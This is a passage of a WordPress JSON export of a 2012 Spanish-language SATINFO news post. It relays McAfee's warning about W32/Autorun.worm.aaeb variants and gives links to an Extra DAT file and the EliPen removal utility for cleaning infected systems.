#4d4c4a;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">) o bien modifique su tarea de actualizaci\u00f3n existente para a\u00f1adir tambi\u00e9n el archivo extraDAT.<\/span><\/span><\/span><\/li>\n<li><span style=\"color: #4d4c4a;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Ejecute la nueva tarea de forma inmediata o programada, al ser un paquete peque\u00f1o no perjudicar\u00e1 el ancho de banda aunque se realice el despliegue de forma recurrente.<\/span><\/span><\/span><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/kc.mcafee.com\/resources\/sites\/MCAFEE\/content\/live\/CORP_KNOWLEDGEBASE\/76000\/KB76807\/en_US\/EXTRA.zip\"><span style=\"color: #0000ff;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><span style=\"text-decoration: underline;\"><strong>Para descargar el archivo Extra DAT pulse aqu\u00ed<\/strong><\/span><\/span><\/span><\/span><\/a><\/p>\n<p><a href=\"https:\/\/www.satinfo.es\/db\/antivirus\/utilitats\/elipen.exe\"><span style=\"color: #0000ff;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><span style=\"text-decoration: underline;\"><strong>Para descargar la utilidad EliPen pulse aqu\u00ed<\/strong><\/span><\/span><\/span><\/span><\/a><\/p>\n<p align=\"LEFT\"><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>SATINFO<\/strong><\/span><\/span><\/span><span style=\"color: #000000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>, <\/strong><\/span><\/span><\/span><span style=\"color: #000000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>SERVICIO DE ASISTENCIA T\u00c9CNICA INFORMATICA<\/strong><\/span><\/span><\/span><span style=\"color: #000000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>2<\/strong><\/span><\/span><\/span><span style=\"color: #000000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>9<\/strong><\/span><\/span><\/span><span style=\"color: #000000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong> de <\/strong><\/span><\/span><\/span><span style=\"color: #000000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Noviembre<\/strong><\/span><\/span><\/span><span style=\"color: #000000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong> de 2012<\/strong><\/span><\/span><\/span><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El gusano W32\/Autorun.worm.aaeb tiene la habilidad de infectar dispositivos extra\u00edbles as\u00ed como unidades de red montadas. La infecci\u00f3n puede iniciarse por una ejecuci\u00f3n manual del archivo infectado o, simplemente, por navegar en cualquier carpeta que contenga los archivos infectados en la que el archivo \u201cAutorun.inf\u201d pueda causar la ejecuci\u00f3n autom\u00e1tica del malware. Adem\u00e1s es capaz <a href='https:\/\/www.satinfo.es\/noticies\/2012\/mcafee-avisa-de-un-brote-de-nuevas-variantes-del-gusano-w32autorun-worm-aaeb\/' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[188,890,892],"tags":[20,309,310,311,303,304,305,306,307,308],"class_list":["post-523","post","type-post","status-publish","format-standard","hentry","category-188","category-mcafee","category-todos","tag-mcafee","tag-vbobfus-ey","tag-vbobfus-ez","tag-vbobfus-fa","tag-w32autorun-worm-aaeb","tag-w32autorun-worm-aaed","tag-w32autorun-worm-aaee","tag-w32autorun-worm-aaef","tag-w32autorun-worm-aaeg","tag-w32autorun-worm-aaeh","category-188-id","category-890-id","category-892-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.satinfo.es\/noticies\/wp-json\/wp\/v2\/posts\/523","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.satinfo.es\/noticies\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.satinfo.es\/noticies\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.satinfo.es\/noticies\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.satinfo.es\/noticies\/wp-json\/wp\/v2\/comments?post=523"}],"version-history":[{"count":0,"href":"https:\/\/www.satinfo.es\/noticies\/wp-json\/wp\/v2\/posts\/523\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.satinfo.es\/noticies\/wp-json\/wp\/v2\/media?parent=523"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.satinfo.es\/noticies\/wp-json\/wp\/v2\/categories?post=523"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.satinfo.es\/noticies\/wp-json\/wp\/v2\/tags?post=523"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}